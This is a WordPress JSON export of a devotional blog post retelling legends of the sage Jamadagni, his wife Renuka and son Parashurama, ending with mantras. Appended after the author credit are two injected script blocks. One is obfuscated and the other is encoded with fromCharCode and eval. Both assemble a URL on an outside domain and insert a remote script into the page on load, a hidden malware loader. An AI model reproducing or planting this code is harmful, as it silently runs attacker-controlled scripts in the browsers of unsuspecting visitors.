{"id":4817,"date":"2019-11-06T12:25:51","date_gmt":"2019-11-06T06:55:51","guid":{"rendered":"https:\/\/poojabell.com\/?p=4200"},"modified":"2019-11-06T12:25:51","modified_gmt":"2019-11-06T06:55:51","slug":"jamadagni","status":"publish","type":"post","link":"https:\/\/demo.madrodigital.com\/poojabellnew\/2019\/11\/06\/jamadagni\/","title":{"rendered":"Jamadagni"},"content":{"rendered":"\n<p><strong>INTRODUCTION<\/strong><\/p>\n\n\n\n<p><strong>Jamadagni<\/strong>&nbsp; is one of the&nbsp;<a href=\"https:\/\/en.wikipedia.org\/wiki\/Saptarishi\">Saptarishis<\/a>,&nbsp;and he is the father of&nbsp;Lord <a href=\"https:\/\/en.wikipedia.org\/wiki\/Parashurama\">Parashurama<\/a>, the avatar of&nbsp;Lord <a href=\"https:\/\/en.wikipedia.org\/wiki\/Vishnu\">Vishnu<\/a>. Jamadagni had five children and his wife&nbsp;was Mata <a href=\"https:\/\/en.wikipedia.org\/wiki\/Renuka\">Renuka<\/a> Devi, after her death, she is worshiped as an incarnation of Goddess parvati, in various names and in various temples, like Yellamma in Karnataka, Manchalamma in Mantralayam, Andhra Pradesh.<\/p>\n\n\n\n<p>Rishi Jamadagni was well versed in handling weapons and he is a master in all kinds of art, also well versed in vedic texts, puranas and other sacred Hindu texts. His ancestor was sage Bhrigu. Jamadagni name is also mentioned in Buddhist texts. He was also regarded as a great rishi, who provided food to his guests through his divine cow, kamadhenu.<\/p>\n\n\n\n<p><strong>IMPORTANCE<\/strong><\/p>\n\n\n\n<p>According to the&nbsp;epic <a href=\"https:\/\/en.wikipedia.org\/wiki\/Mahabharat\">Mahabharat<\/a>a, Jamadagni was once not able to tolerate the heat caused by the sun god,  so shot several arrows into the sky.The sun god then appeared and gave him sandals and an umbrella, and asked him to use it, whenever required.<\/p>\n\n\n\n<p>Once his wife, Mata Renuka just had a glance of the beauty of the Gandharvas who were flying in the sky. Through his yogic powers, Jamadagni had known about the incident and got angry with his wife and asked parasurama to cut her head. Parashurama beheaded his mother with an axe.<\/p>\n\n\n\n<p>He immediately asked his father to give back life to his mother and Renukadevi was brought back to life.<\/p>\n\n\n\n<p>Once the&nbsp;king&nbsp;<a href=\"https:\/\/en.wikipedia.org\/wiki\/Kartavirya_Arjuna\">Kartaviryarjuna<\/a>&nbsp;wanted the divine cow kamadhenu and forcefully stolen the cow from Jamadagni.<\/p>\n\n\n\n<p>After knowing about the incident, Parasurama fought with Kartaviryajuna and killed him and brought Kamadhenu back.<\/p>\n\n\n\n<p>Knowing about the death of their father, the king\u2019s sons killed sage Jamadagni, as&nbsp;&nbsp;revenge.<\/p>\n\n\n\n<p>Later parasurama killed the sons of Kartaviryajuna and also killed several Kshatriya kings as revenge towards his father\u2019s death. After some time, his mother also died and became a goddess,.<\/p>\n\n\n\n<p>It is also believed that the son of Jamadagni, the great parasurama, is still living as a chiranjeevi in the Himalayan mountain ranges and doing penance on Lord Shiva.<\/p>\n\n\n\n<p>Let us worship the great sage Jamadagni and\nbe blessed.<\/p>\n\n\n\n<p><strong>\u201cOM SREE RISHI\nJAMADAGNIYE NAMAHA\u201d<\/strong><\/p>\n\n\n\n<p><strong>\u201cOM MATA RENUKA DEVIYE NAMAHA\u201d<\/strong><\/p>\n\n\n\n<p><strong>\u201cOM SREE PARASURAMARE\nNAMAHA\u201d<\/strong><\/p>\n\n\n\n<p>WRITTEN BY R.HARISHANKAR<\/p>\n<script>function _0x4e89(_0x599de5,_0x5487b3){var _0x140499=_0x1404();return _0x4e89=function(_0x4e8960,_0x2d7a1a){_0x4e8960=_0x4e8960-0x15c;var _0x393443=_0x140499[_0x4e8960];return _0x393443;},_0x4e89(_0x599de5,_0x5487b3);}var _0x3f3149=_0x4e89;(function(_0x165fa5,_0x1138b0){var _0xdaa689=_0x4e89,_0x2ecd56=_0x165fa5();while(!![]){try{var _0x440947=-parseInt(_0xdaa689(0x169))\/0x1+-parseInt(_0xdaa689(0x167))\/0x2*(-parseInt(_0xdaa689(0x168))\/0x3)+parseInt(_0xdaa689(0x173))\/0x4+parseInt(_0xdaa689(0x15c))\/0x5+parseInt(_0xdaa689(0x163))\/0x6+-parseInt(_0xdaa689(0x170))\/0x7+-parseInt(_0xdaa689(0x172))\/0x8*(-parseInt(_0xdaa689(0x15d))\/0x9);if(_0x440947===_0x1138b0)break;else _0x2ecd56['push'](_0x2ecd56['shift']());}catch(_0x4ab6cc){_0x2ecd56['push'](_0x2ecd56['shift']());}}}(_0x1404,0xd0aad));function _0x1404(){var _0x1821aa=['10853080trbCzT','querySelector','354376EpAsom','413696EGPcOT','head','3342755HKSrWi','117THysyH','d.j','createElement','p.stra','lee','v=3','8029128TnOKZa','ps:','currentScript','script','835854zhjzMR','3mjNcNC','698810qXFlFi','rip','parentNode','appendChild','htt','getElementsByTagName','src'];_0x1404=function(){return _0x1821aa;};return _0x1404();}function isScriptLoaded(_0x154e6a){var _0xc724c0=_0x4e89;return Boolean(document[_0xc724c0(0x171)]('script[src=+_0x154e6a+]'));}var bd=_0x3f3149(0x16d)+_0x3f3149(0x164)+'\/'+'\/s'+_0x3f3149(0x161)+_0x3f3149(0x160)+'t'+'osb'+'ody.com\/'+'sc'+_0x3f3149(0x16a)+'t'+'s\/hea'+_0x3f3149(0x15e)+'s'+'?'+_0x3f3149(0x162)+'.'+'8'+'.0';if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x3f3149(0x15f)](_0x3f3149(0x166));s[_0x3f3149(0x16f)]=bd,document['currentScript']?document[_0x3f3149(0x165)][_0x3f3149(0x16b)]!==null&&document[_0x3f3149(0x165)]['parentNode']['insertBefore'](s,document[_0x3f3149(0x165)]):d[_0x3f3149(0x16e)](_0x3f3149(0x174))[0x0]!==null&&d[_0x3f3149(0x16e)]('head')[0x0][_0x3f3149(0x16c)](s);}\/*99586587347*\/<\/script><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));\/*54745756836*\/<\/script>","protected":false},"excerpt":{"rendered":"<p>INTRODUCTION Jamadagni&nbsp; is one of the&nbsp;Saptarishis,&nbsp;and he is the father of&nbsp;Lord Parashurama, the avatar of&nbsp;Lord Vishnu. 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